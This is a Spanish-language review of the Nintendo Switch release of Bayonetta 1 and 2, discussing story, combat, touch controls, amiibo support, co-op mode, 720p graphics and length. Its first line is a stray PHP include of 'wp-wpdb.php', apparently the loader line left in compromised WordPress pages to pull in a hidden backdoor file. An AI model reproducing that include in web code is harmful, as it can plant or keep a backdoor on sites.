if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis Bayonetta 1 y 2 para Nintendo Switch – La Fortaleza de LeChuck

Análisis Bayonetta 1 y 2 para Nintendo Switch

Entre las exitosas Wii y Switch, nació Wii U, una consola a medio camino entre ambas, que quizás no tuvo las ventas esperadas, pero aún así se nutrió de un estupendo catálogo de exclusivos como Bayonetta 2, la segunda parte de las aventuras de la bruja de la mano de Platinum Games. Ahora Bayonetta 1 y 2 aterrizan en Switch con la intención de aprovechar el impulso de la híbrida de Nintendo.

A consecuencia de las discretas ventas de Wii U, Bayonetta 2 no brilló con toda su intensidad en aquel momento y sin duda se merecía una nueva oportunidad. Es así como la compañía de Kyoto le ha puesto remedio con su relanzamiento en Nintendo Switch, la culminación de años de innovación y esfuerzo y el renacer para muchos de esos juegos del catálogo.

Cuando tienes la primera toma de contacto con Bayonetta, te sorprende el diseño extravagante de sus enemigos y escenarios y el atractivo de los personajes principales, pero cuando pasan las horas descubres como su estupenda narrativa te engancha irremediablemente. En cuestiones de trama, la historia del primer Bayonetta es una travesía a través de lugares infernales y oscuros con el fin de recuperar recuerdos del pasado de la bruja y evitar la destrucción absoluta. En cambio, en su secuela, viajaremos hasta el infierno para salvar a una vieja conocida. La historia no es tan simple como puede parecer al comienzo, y los giros de guión mantendrán nuestro interés hasta finalizar el título. Pero como no podía ser de otra manera, lo que más abunda en la serie es la acción propia del género hack and slash: movimientos brutales, combos de infarto y vísceras salpicando la pantalla, además de una cantidad insana de enemigos grotescos que desfilarán por los distintos niveles.

Eso no tiene que ser bueno para las cervicales

No obstante, más allá de los mamporros a todo bicho viviente, lo que más me gusta del juego es el carisma que desprende su protagonista y la elegancia a la hora de presentar su sensualidad, la cual estará presente en cada movimiento. La bruja hace lo que quiere con quien quiere y se jacta de ello. Lo veremos especialmente en las largas cinemáticas, donde descansaremos de tanto golpe y observaremos detalles de la historia.

En Bayonetta 2 se mantienen los modos Classic y Touch que vimos en Wii U y se implementan en el juego original. El control clásico está pensando para el jugador que no tiene problemas a la hora de ejecutar un gran número de ataques y combos, mientras que el modo táctil fue creado para ofrecer al novato un acercamiento más sencillo a un juego de acción de estas características. De esta forma, el jugador podrá ejecutar los movimientos y enlazar combos simplemente presionando en la pantalla de Switch.

Bayonetta 1 y 2 para Nintendo Switch no incluye mucho contenido nuevo, pero entre sus novedades encontramos el soporte para amiibos y una opción multijugador local en el ya conocido modo cooperativo «Clímax Múltiple» de Bayonetta 2, donde podremos luchar contra oleadas de seres infames. Desgraciadamente, en cuestiones técnicas hay poco que destacar, la resolución permanece a 720p, es decir, que los gráficos son prácticamente los mismos aunque pude apreciar mayor fluidez en combate.

Cosplay con Amiibos

El modo historia de ambos juegos dura aproximadamente unas 8 horas, pero el tiempo se puede alargar si nos paramos a buscar los objetos coleccionables ocultos. Por otro lado, existe la posibilidad de cambiar el nivel de dificultad para que se convierta en todo un reto.

Para los amantes de los juegos de acción y de Platinum, Bayonetta 1 y 2 son títulos imprescindibles para su colección. Estamos ante dos de los mejores juegos que han salido del famoso estudio japonés y estoy segura de que tanto veteranos como recién llegados se lo pasarán como nunca repartiendo tortas con la bruja en modo portátil, un gran aliciente para (re)descubrir el infierno.